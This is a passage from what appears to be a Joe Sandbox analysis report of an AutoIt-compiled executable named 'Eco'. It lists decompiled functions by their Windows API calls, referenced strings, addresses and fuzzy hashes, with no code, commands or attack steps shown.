                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                          • String ID: (
                          • API String ID: 2598888154-3887548279
                          • Opcode ID: cde87dbc01b344424b0eb9667fb13935bd967d435fb219f647e4bedf78c52e0f
                          • Instruction ID: 7b18f5eec8f3509e3e7b183f74f0e1e3815d5476bb1e073e41b4578a9c6ac89a
                          • Opcode Fuzzy Hash: cde87dbc01b344424b0eb9667fb13935bd967d435fb219f647e4bedf78c52e0f
                          • Instruction Fuzzy Hash: 76513771904209AFCB15DFA8CC89EAEBBB9FF49310F14841DF95AA7250D731A945CB60
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0057A341
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 0057A363
                          • __swprintf.LIBCMT ref: 0057A3BC
                          • __swprintf.LIBCMT ref: 0057A3D5
                          • _wprintf.LIBCMT ref: 0057A48B
                          • _wprintf.LIBCMT ref: 0057A4A9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: LoadString__swprintf_wprintf$_memmove
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 311963372-2391861430
                          • Opcode ID: f45e1f3bc156a00e230c595acf720f56e3bd1331a36827530cea620628f5ea13
                          • Instruction ID: e41295136ab9f1475fa1b5d0d582dd00243e824e0ba0efcb19b0d7f2eca32d69
                          • Opcode Fuzzy Hash: f45e1f3bc156a00e230c595acf720f56e3bd1331a36827530cea620628f5ea13
                          • Instruction Fuzzy Hash: 4851B37180051AAACF14EBE0ED4AEEEBF79BF65340F104165F40972091EB312F59EBA5
                          APIs
                            • Part of subcall function 00579387: __time64.LIBCMT ref: 00579391
                            • Part of subcall function 00524A8C: _fseek.LIBCMT ref: 00524AA4
                          • __wsplitpath.LIBCMT ref: 0057965C
                            • Part of subcall function 0053424E: __wsplitpath_helper.LIBCMT ref: 0053428E
                          • _wcscpy.LIBCMT ref: 0057966F
                          • _wcscat.LIBCMT ref: 00579682
                          • __wsplitpath.LIBCMT ref: 005796A7
                          • _wcscat.LIBCMT ref: 005796BD
                          • _wcscat.LIBCMT ref: 005796D0
                            • Part of subcall function 005793CD: _memmove.LIBCMT ref: 00579406
                            • Part of subcall function 005793CD: _memmove.LIBCMT ref: 00579415
                          • _wcscmp.LIBCMT ref: 00579617
                            • Part of subcall function 00579B5E: _wcscmp.LIBCMT ref: 00579C4E
                            • Part of subcall function 00579B5E: _wcscmp.LIBCMT ref: 00579C61
                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0057987A
                          • _wcsncpy.LIBCMT ref: 005798ED
                          • DeleteFileW.KERNEL32(?,?), ref: 00579923
                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00579939
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0057994A
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0057995C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                          • String ID:
                          APIs
                          • _memset.LIBCMT ref: 00525BF1
                          • GetMenuItemCount.USER32(005D6890), ref: 00560DFB
                          • GetMenuItemCount.USER32(005D6890), ref: 00560EAB
                          • GetCursorPos.USER32(?), ref: 00560EEF
                          • SetForegroundWindow.USER32(00000000), ref: 00560EF8
                          • TrackPopupMenuEx.USER32(005D6890,00000000,?,00000000,00000000,00000000), ref: 00560F0B
                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00560F17
                          Similarity
                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                          • String ID:
                          APIs
                          • CharLowerBuffW.USER32(?,?,005A0980), ref: 0057ADBB
                          • GetDriveTypeW.KERNEL32(00000061,005C9970,00000061), ref: 0057AE85
                          • _wcscpy.LIBCMT ref: 0057AEAF
                          Strings
                          Similarity
                          • API ID: BuffCharDriveLowerType_wcscpy
                          • String ID: L,Z$all$cdrom$fixed$network$ramdisk$removable$unknown
                          APIs
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          • _memset.LIBCMT ref: 0056826C
                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005682A1
                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005682BD
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005682D9
                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00568303
                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0056832B
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00568336
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0056833B
                          Strings
                          Similarity
                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                          APIs
                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,005901D5,?,?), ref: 00591259
                          Strings
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                          APIs
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                            • Part of subcall function 0052153B: _memmove.LIBCMT ref: 005215C4
                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00575758
                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0057576E
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057577F
                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00575791
                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 005757A2
                          Strings
                          Similarity
                          • API ID: SendString$_memmove
                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                          APIs
                          Strings
                          Similarity
                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                          • String ID: 0.0.0.0
                          APIs
                          • timeGetTime.WINMM ref: 005753A2
                            • Part of subcall function 0053074E: timeGetTime.WINMM(?,00000002,0051C22C), ref: 00530752
                          • Sleep.KERNEL32(0000000A), ref: 005753CE
                          • EnumThreadWindows.USER32(?,Function_00065350,00000000), ref: 005753F2
                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00575414
                          • SetActiveWindow.USER32 ref: 00575433
                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00575441
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00575460
                          • Sleep.KERNEL32(000000FA), ref: 0057546B
                          • IsWindow.USER32 ref: 00575477
                          • EndDialog.USER32(00000000), ref: 00575488
                          Strings
                          Similarity
                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                          • String ID: BUTTON
                          APIs
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                          • CoInitialize.OLE32(00000000), ref: 0057DA9A
                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0057DB2D
                          • SHGetDesktopFolder.SHELL32(?), ref: 0057DB41
                          • CoCreateInstance.OLE32(005A3D4C,00000000,00000001,005C9BEC,?), ref: 0057DB8D
                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0057DBFC
                          • CoTaskMemFree.OLE32(?,?), ref: 0057DC54
                          • _memset.LIBCMT ref: 0057DC91
                          • SHBrowseForFolderW.SHELL32(?), ref: 0057DCCD
                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0057DCF0
                          • CoTaskMemFree.OLE32(00000000), ref: 0057DCF7
                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0057DD2E
                          • CoUninitialize.OLE32(00000001,00000000), ref: 0057DD30
                          Similarity
                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                          • String ID:
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00570702
                          • SetKeyboardState.USER32(?), ref: 0057076D
                          • GetAsyncKeyState.USER32(000000A0), ref: 0057078D
                          • GetKeyState.USER32(000000A0), ref: 005707A4
                          • GetAsyncKeyState.USER32(000000A1), ref: 005707D3
                          • GetKeyState.USER32(000000A1), ref: 005707E4
                          • GetAsyncKeyState.USER32(00000011), ref: 00570810
                          • GetKeyState.USER32(00000011), ref: 0057081E
                          • GetAsyncKeyState.USER32(00000012), ref: 00570847
                          • GetKeyState.USER32(00000012), ref: 00570855
                          • GetAsyncKeyState.USER32(0000005B), ref: 0057087E
                          • GetKeyState.USER32(0000005B), ref: 0057088C
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          APIs
                          • GetDlgItem.USER32(?,00000001), ref: 0056CBFF
                          • GetWindowRect.USER32(00000000,?), ref: 0056CC11
                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0056CC6F
                          • GetDlgItem.USER32(?,00000002), ref: 0056CC7A
                          • GetWindowRect.USER32(00000000,?), ref: 0056CC8C
                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0056CCE0
                          • GetDlgItem.USER32(?,000003E9), ref: 0056CCEE
                          • GetWindowRect.USER32(00000000,?), ref: 0056CCFF
                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0056CD42
                          • GetDlgItem.USER32(?,000003EA), ref: 0056CD50
                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0056CD6D
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0056CD7A
                          Similarity
                          • API ID: Window$ItemMoveRect$Invalidate
                          • String ID:
                          APIs
                            • Part of subcall function 005129AB: GetWindowLongW.USER32(?,000000EB), ref: 005129BC
                          • GetSysColor.USER32(0000000F), ref: 005125AF
                          Similarity
                          • API ID: ColorLongWindow
                          • String ID:
                          APIs
                            • Part of subcall function 00530AB6: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00522A3E,?,00008000), ref: 00530AD2
                            • Part of subcall function 005301AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00522A58,?,00008000), ref: 005301CF
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00522ADF
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00522C2C
                            • Part of subcall function 00523EBE: _wcscpy.LIBCMT ref: 00523EF6
                            • Part of subcall function 0053379F: _iswctype.LIBCMT ref: 005337A7
                          Strings
                          Similarity
                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                          • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                            • Part of subcall function 00512714: GetCursorPos.USER32(?), ref: 00512727
                            • Part of subcall function 00512714: ScreenToClient.USER32(005D67B0,?), ref: 00512744
                            • Part of subcall function 00512714: GetAsyncKeyState.USER32(00000001), ref: 00512769
                            • Part of subcall function 00512714: GetAsyncKeyState.USER32(00000002), ref: 00512777
                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0059C417
                          • ImageList_EndDrag.COMCTL32 ref: 0059C41D
                          • ReleaseCapture.USER32 ref: 0059C423
                          • SetWindowTextW.USER32(?,00000000), ref: 0059C4CD
                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0059C4E0
                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0059C5C2
                          Strings
                          Similarity
                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$pr]$pr]
                          • API String ID: 1924731296-454660812
                          • Opcode ID: ed540159ded792fcc6b51b04bee8bb1d8f77da5517aae58f6cee5aa38af89428
                          • Instruction ID: 59a39d29d2bb284ad6302f41188b2f9b03b5621548d49155d556199c588b9e29
                          • Opcode Fuzzy Hash: ed540159ded792fcc6b51b04bee8bb1d8f77da5517aae58f6cee5aa38af89428
                          • Instruction Fuzzy Hash: 59518770204305AFDB10EF24C85AFAA7FE0FB99310F00491AF595872E1CB70A949EB52
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __i64tow__itow__swprintf
                          • String ID: %.15g$0x%p$False$True
                          • API String ID: 421087845-2263619337
                          • Opcode ID: f2df4df083ee1420014d14a2877d22b2f1cd31bed91b70073c31460c74d159eb
                          • Instruction ID: 89258002095ae12c824277a149117f33c94076f09ccc09ebc72a3cc32a59a822
                          • Opcode Fuzzy Hash: f2df4df083ee1420014d14a2877d22b2f1cd31bed91b70073c31460c74d159eb
                          • Instruction Fuzzy Hash: 3741E27150420AAEEF24DF74E846EBA7FF8FF85304F20486EE549D7291EA319941CB61
                          APIs
                          • _memset.LIBCMT ref: 00597557
                          • CreateMenu.USER32 ref: 00597572
                          • SetMenu.USER32(?,00000000), ref: 00597581
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0059760E
                          • IsMenu.USER32(?), ref: 00597624
                          • CreatePopupMenu.USER32 ref: 0059762E
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0059765B
                          • DrawMenuBar.USER32 ref: 00597663
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                          • String ID: 0$F
                          • API String ID: 176399719-3044882817
                          • Opcode ID: 5e1280845a39ada298eb947f2c56878fa8c53c375f97227d45197f45b75193dc
                          • Instruction ID: b2d7bf7aadddc29ebd70aa49dfe13f1a14527e8254e2e35ec7d22d97d8ef1eba
                          • Opcode Fuzzy Hash: 5e1280845a39ada298eb947f2c56878fa8c53c375f97227d45197f45b75193dc
                          • Instruction Fuzzy Hash: A2416878A11209EFDF20DF68D884AAA7BF5FF5E340F14006AE945973A0D770A914DF90
                          APIs
                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0059794B
                          • CreateCompatibleDC.GDI32(00000000), ref: 00597952
                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00597965
                          • SelectObject.GDI32(00000000,00000000), ref: 0059796D
                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00597978
                          • DeleteDC.GDI32(00000000), ref: 00597981
                          • GetWindowLongW.USER32(?,000000EC), ref: 0059798B
                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0059799F
                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 005979AB
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                          • String ID: static
                          • API String ID: 2559357485-2160076837
                          • Opcode ID: 3860c0dae97e3b491e9572b5a083fcbe5b501840d7a10e1b3beec525b4282459
                          • Instruction ID: 4ba7b752e63f427e694745f47b91f596c71f01427aa04f52f399dc63de9ac094
                          • Opcode Fuzzy Hash: 3860c0dae97e3b491e9572b5a083fcbe5b501840d7a10e1b3beec525b4282459
                          • Instruction Fuzzy Hash: BB317832124219ABEF119F64DC09FEB3F69FF5E364F100216FA55A60E0C7319825EBA4
                          APIs
                          • _memset.LIBCMT ref: 00536F9B
                            • Part of subcall function 00538C88: __getptd_noexit.LIBCMT ref: 00538C88
                          • __gmtime64_s.LIBCMT ref: 00537034
                          • __gmtime64_s.LIBCMT ref: 0053706A
                          • __gmtime64_s.LIBCMT ref: 00537087
                          • __allrem.LIBCMT ref: 005370DD
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005370F9
                          • __allrem.LIBCMT ref: 00537110
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0053712E
                          • __allrem.LIBCMT ref: 00537145
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00537163
                          • __invoke_watson.LIBCMT ref: 005371D4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                          • String ID:
                          • API String ID: 384356119-0
                          • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                          • Instruction ID: 463a5fab80120cb36fa04d118fb1d61cf0ec90f7e246a053146768bbf510e170
                          • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                          • Instruction Fuzzy Hash: 2071E6B2E0071BBBD7249E79CC46BAABBA8BF55724F148239F514D7281E770D9408BD0
                          APIs
                          • _memset.LIBCMT ref: 00572B55
                          • GetMenuItemInfoW.USER32(005D6890,000000FF,00000000,00000030), ref: 00572BB6
                          • SetMenuItemInfoW.USER32(005D6890,00000004,00000000,00000030), ref: 00572BEC
                          • Sleep.KERNEL32(000001F4), ref: 00572BFE
                          • GetMenuItemCount.USER32(?), ref: 00572C42
                          • GetMenuItemID.USER32(?,00000000), ref: 00572C5E
                          • GetMenuItemID.USER32(?,-00000001), ref: 00572C88
                          • GetMenuItemID.USER32(?,?), ref: 00572CCD
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00572D13
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00572D27
                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00572D48
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                          • String ID:
                          • API String ID: 4176008265-0
                          • Opcode ID: 8064e074d8e75301d2019d31ab0f90ee86154c2dc2b150daaf6e9d9cca35f9e3
                          • Instruction ID: 047c286df55f6f5678ba3cff9adc36f7a5359586fd0ff75f93aa83f59915f332
                          • Opcode Fuzzy Hash: 8064e074d8e75301d2019d31ab0f90ee86154c2dc2b150daaf6e9d9cca35f9e3
                          • Instruction Fuzzy Hash: AC61AFB0900249AFDF21CF64EC889BE7FB8FB55304F148459E809A7291D731AD06FB21
                          APIs
                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00597392
                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00597395
                          • GetWindowLongW.USER32(?,000000F0), ref: 005973B9
                          • _memset.LIBCMT ref: 005973CA
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005973DC
                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00597454
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow_memset
                          • String ID:
                          • API String ID: 830647256-0
                          • Opcode ID: 77600e12936564fb3c724cc3371444e9a92cfc6c1b0201460d9b0a9e45dc94be
                          • Instruction ID: 2f84b2aa19a2adeca4f1c3fae105931dce73caba764b1ba7b5ee47e08715ce97
                          • Opcode Fuzzy Hash: 77600e12936564fb3c724cc3371444e9a92cfc6c1b0201460d9b0a9e45dc94be
                          • Instruction Fuzzy Hash: 66615B75900208AFDF20DF98CC85EEE7BF8FB49714F10055AFA14A72A1C770A946DB90
                          APIs
                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 005675C0
                          • SafeArrayAllocData.OLEAUT32(?), ref: 00567619
                          • VariantInit.OLEAUT32(?), ref: 0056762B
                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0056764B
                          • VariantCopy.OLEAUT32(?,?), ref: 0056769E
                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 005676B2
                          • VariantClear.OLEAUT32(?), ref: 005676C7
                          • SafeArrayDestroyData.OLEAUT32(?), ref: 005676D4
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005676DD
                          • VariantClear.OLEAUT32(?), ref: 005676EF
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005676FA
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                          • String ID:
                          • API String ID: 2706829360-0
                          • Opcode ID: 12989be504198208603404533a69048f1895dc48696e28dd4b19dc4b08628c16
                          • Instruction ID: f1d4b39fadb86ff22564e9932e0ecf5b75ce7f56209a8c96de418db22f9cf7d2
                          • Opcode Fuzzy Hash: 12989be504198208603404533a69048f1895dc48696e28dd4b19dc4b08628c16
                          • Instruction Fuzzy Hash: 05416B75A1421DAFCF00DFA8D8489ADBFB9FF5C354F008069E915A7261CB30A949DFA0
                          APIs
                          • GetKeyboardState.USER32(?), ref: 0057039C
                          • GetAsyncKeyState.USER32(000000A0), ref: 0057041D
                          • GetKeyState.USER32(000000A0), ref: 00570438
                          • GetAsyncKeyState.USER32(000000A1), ref: 00570452
                          • GetKeyState.USER32(000000A1), ref: 00570467
                          • GetAsyncKeyState.USER32(00000011), ref: 0057047F
                          • GetKeyState.USER32(00000011), ref: 00570491
                          • GetAsyncKeyState.USER32(00000012), ref: 005704A9
                          • GetKeyState.USER32(00000012), ref: 005704BB
                          • GetAsyncKeyState.USER32(0000005B), ref: 005704D3
                          • GetKeyState.USER32(0000005B), ref: 005704E5
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
